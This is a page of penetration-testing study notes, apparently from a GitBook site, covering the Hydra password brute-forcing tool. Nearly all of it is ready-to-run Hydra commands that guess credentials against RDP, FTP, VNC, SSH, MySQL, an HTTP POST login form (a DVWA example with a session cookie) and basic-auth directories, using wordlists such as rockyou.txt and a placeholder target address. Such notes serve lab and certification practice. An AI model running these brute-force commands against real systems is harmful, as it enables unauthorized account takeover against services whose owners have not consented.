Hack$Notes
  • Hack$Notes
  • Enumeration
    • NMAP Scanning
    • Hping3 Scanning
      • IDLE SCAN
    • DNS Enum
    • SMB Enum
    • SMTP Enum
    • POP3
    • SNMP Enum
    • LDAP Enum
    • HTTP Enum
      • CheckList
    • FTP Enum
    • SSH Enum
    • MySQL Enum
    • Oracle Enum
    • NFS Enum
    • Internet Relay Chat (IRC)
    • Telnet
    • Kerberos
    • Finger
    • Ports Open/Close
    • ident
    • Postgresl
  • Transferring Files
  • Metasploit Framework
    • Msfvenom tutorial
    • Msfvenom Payloads
  • Reverse Shells
  • Buffer Overflow
    • B.O Steps
    • SLmail B.O
  • Spawning a Shell
  • Password Attacks
    • Passing the Hash
    • SAM/SYSTEM
    • Passwords
    • Hydra
    • Medusa
    • Ncrack
    • Unshadow
    • Hashcat
    • John The Ripper
    • fcrackzip
  • Privilege Escalation
    • Windows
      • Kernel Exploits
      • Stored Credentials
      • Unquoted Service Path
      • Always Install Elevated
      • Weak Permissions
      • Schedule Tasks
      • AutoRun Executables
      • Startup Apps
      • Passwords
      • Win PrivEsc Tools
    • Linux
      • Kernel Exploits
      • Service Exploits
      • PATH Variable
      • SUID/GUID files
      • CronJobs
      • Sudo
      • Custom Executable
      • Linux PrivEsc Tools
  • Port Forwarding
  • Tools / Techniques
    • General Check List
    • Misc. Commands
    • Steganography
    • Evasion Techniques
    • SQL Injection Payloads
    • LFI / RFI
    • Recover contents
    • JAR Files
    • Strace/Ltrace
    • Port Knocking
    • Screenshots in Kali
    • Curl
  • Resources
    • Books
    • Links
Powered by GitBook
On this page
  • RDP
  • FTP
  • VNC
  • SSH
  • MySQL
  • Web Login
  • Basic Authentication

Was this helpful?

  1. Password Attacks

Hydra

Hydra Brute Force

RDP

hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://10.10.10.10
    -t: number of tasks run in parallel
    -V: verbose
    -f: quit once correct credentials found
    -l: username
    -P: passwords on a file

FTP

hydra -t 5 -V -f -L userlist -P passwordlist ftp://10.10.10.10
    -t: number of tasks run in parallel
    -V: verbose
    -f: quit once correct credentials found
    -l: username list
    -P: password list

VNC

hydra -P passwordlist -t 1 -w 5 -f -s 5901 10.10.10.10 vnc -v
    -s: port to connect to

SSH

hydra -l admin -P passwordlist ssh://10.10.10.10 -V

MySQL

hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.10.10 mysql -t 4

Web Login

hydra 10.10.10.10 -V -l admin -P passwordlist http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=tjflbmwot3dqbj1ph3tmjchel2; security=low"

Basic Authentication

hydra -l username -P /path/to/wordlist -f 10.10.10.10 http-get /directory
hydra -l username -P /path/to/wordlist -f 10.10.10.10 http-get -s 8080

PreviousPasswordsNextMedusa

Last updated 3 years ago

Was this helpful?